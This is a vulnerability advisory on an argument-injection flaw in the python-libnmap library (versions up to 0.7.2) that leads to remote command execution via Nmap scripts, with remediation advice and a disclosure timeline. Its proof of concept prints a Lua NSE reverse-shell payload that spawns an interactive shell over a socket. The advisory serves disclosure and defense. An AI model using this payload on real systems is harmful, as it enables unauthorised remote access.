Swascan Offensive Security Team has identified a severe vulnerability on the python-libnmap Python library (https://pypi.org/project/python-libnmap/).
Python-libnmap
Python-libnmap is a python library, developed by Ronald Bister, enabling python developers to manipulate nmap process and data.
The library offers the following features:
- automate or schedule nmap scans on a regular basis
- manipulate nmap scans results to do reporting
- compare and diff nmap scans to generate graphs
- batch process scan reports
- more…
Technical Summary
Swascan Offensive Security Team discovered an important vulnerability on python-libnmap <= 0.7.2.
Vulnerability | CVSSv3.1 |
python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution | 9.0 – Critical [AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] |
This library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution through the Nmap Scripting Language (NSE).
The Swascan Offensive Security Team recommends all the developers using this Python library to check for a fixed version and to follow our recommendations reported below to make sure that the potential risk is mitigated.
Vulnerability details
Critical python-libnmap <=0.7.2 – Argument Injection to Remote Command Execution
CWE-88: Argument Injection
CVSSv3.1: 9.0 [ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H ]
OWASP: A03:2021 – Injection
Remediation Complexity: HIGH
Description
The library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution.
When the client application fails to validate the user input, the library allows to inject arbitrary arguments in the final nmap command line being executed on the underlying Opearting System, leading to the upload and execution of a custom LUA script using the Nmap Scripting Language (NSE).
Proof of Concept
When spawning the nmap process, quotation is not closed correctly as shown in this PoC:
If the client application does not correctly validate the targets argument value, a potential attacker could manipulate the nmap command line as shown in the following image:
Remote Code Execution becomes then possible using the http-fetch script, and by uploading and executing the following NSE reverse shell script:
local handle = io.popen(“python3 -c ‘import sock-et,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”127.0.0.1\”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);'”)
local result = handle:read(“*a”)
handle:close()
After having uploaded the NSE reverse shell on the target system, it can be executed:
Impact
When exploited, this vulnerability can cause the access to the underlying operating system and thus to the client application’s data with the application’s user privileges.
Remediation
At the time of writing, there is still not a remediation at the library level as the developer Ronald Bister has not released an update yet.
Developers using this Python library to make their nmap network or vulnerability scanning tasks must:
- Update the library as soon as a newer version will be released;
- Ensure that the targets argument value, when instantiating the NmapProcess class, is being correctly validated and does not contain invalid characters.
For a full remediation on the client application side, the targets argument value should be validated against the following use cases:
- FQDNs
- Simple hostnames (could be stored in /etc/hosts or completed by the domain or search suffix from resolv.conf)
- IPv4+6
- IPv4+6 CIDR notation
- IPv4+6 series notation (e.g.: 192.138.5.1-5,8,9,266)
Disclosure Timeline
- 14-02-2022: Vulnerability discovered
- 14-02-2022: Developer contacted by email
- 15-02-2022: Report shared with the developer
- 16-02-2022: Developer acknownleged the vulnerability
- 16-02-2022: CVE ID requested
- 25-04-2022: A fix is still not available, the developer agree to publish
- 05-05-2022: Issued CVE ID CVE-2022-30284